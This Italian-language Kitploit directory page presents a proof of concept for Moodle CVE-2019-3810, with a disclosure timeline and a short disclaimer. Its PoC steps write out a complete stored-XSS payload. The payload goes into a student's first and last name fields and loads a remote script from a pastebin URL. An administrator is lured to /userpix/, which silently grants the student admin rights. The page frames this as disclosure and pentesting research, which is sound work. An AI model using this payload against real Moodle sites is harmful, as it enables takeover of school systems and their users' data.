Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC per Privilege Escalation (da Studente ad Amministratore) | Kitploit
Strumenti/GitHubGitHub/farisv/moodle-cve-2019-3810
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC per Privilege Escalation (da Studente ad Amministratore)

Vedi Repository
17215 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS per Escalata dei Privilegi (Studente ad Amministratore). Questo è uno dei bug passati che ho scoperto durante un precedente pentest in un'istituzione accademica. All'epoca era abbastanza efficace da rubare praticamente l'accesso amministrativo e ottenere il controllo completo su Moodle usando un solo semplice bug.

Possiamo vedere dalla cronologia di git, il bug esisteva dalle vecchie versioni di Moodle (2003) ed è stato appena corretto nel 2019.

Cronologia:

  • Dicembre 2018 - Segnalato il bug a Moodle
  • Gennaio 2019 - Rilasciata la patch
  • Aprile 2021 - Divulgazione del PoC

WARNING

SOLO A SCOPO EDUCATIVO. NON UTILIZZARE L'EXPLOIT PER ATTIVITÀ ILLEGALI. L'AUTORE NON È RESPONSABILE PER QUALSIASI USO IMPROPRIO O DANNO.

PoC

  1. Carica il payload.js su pastebin o altro servizio simile. Cambia il valore di userid con il tuo id. Supponiamo che l'URL sia https://pastebin.com/raw/xxxxxxxx.
  2. Accedi al tuo account studente.
  3. Imposta il nome con " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Imposta il cognome con ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Chiedi all'amministratore di aprire la pagina /userpix/ o inserisci il link a quella pagina nel tuo post e attendi.

Se ha successo, il tuo account verrà aggiunto come amministratore.

Demonstration video

Scarica lo strumento